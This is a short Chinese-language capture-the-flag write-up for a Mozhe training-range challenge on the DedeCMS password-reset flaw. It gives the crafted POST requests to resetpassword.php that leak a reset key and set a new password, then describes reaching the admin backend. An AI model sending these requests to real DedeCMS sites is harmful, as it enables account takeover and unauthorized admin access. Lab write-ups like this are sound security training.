墨者 在线靶场 CMS系统漏洞分析溯源(第7题)
墨者 在线靶场 CMS系统漏洞分析溯源(第7题)
DEDECMS 任意用户密码重置漏洞利用
开始用 admin 发现前台出错,后台也登录不了,改用 test 帐号
利用burp 抓包改 Post
http://219.153.49.228:47764/member/resetpassword.php
POST /member/resetpassword.php HTTP/1.1
dopost=safequestion&safequestion=0.0&safeanswer=&id=2 (2为 test 的ID)
forward 之后 获取跳转页面 里面的 key 值
再用 burp post
/member/resetpassword.php
dopost=getpasswd&setp=2&id=2&userid=test&key=5S3NSMNQ&pwd=123456&pwdok=123456
key 为刚刚获取的 key 值,重置密码为 123456
用 test 密码 123456 登录,登录成功个人基本资料 有电子邮箱
用 电子邮箱 登录 后台 http://219.153.49.228:47764/dede/login.php
帐号 admin 密码 电子邮箱
登录成功,key 在 网站根目录下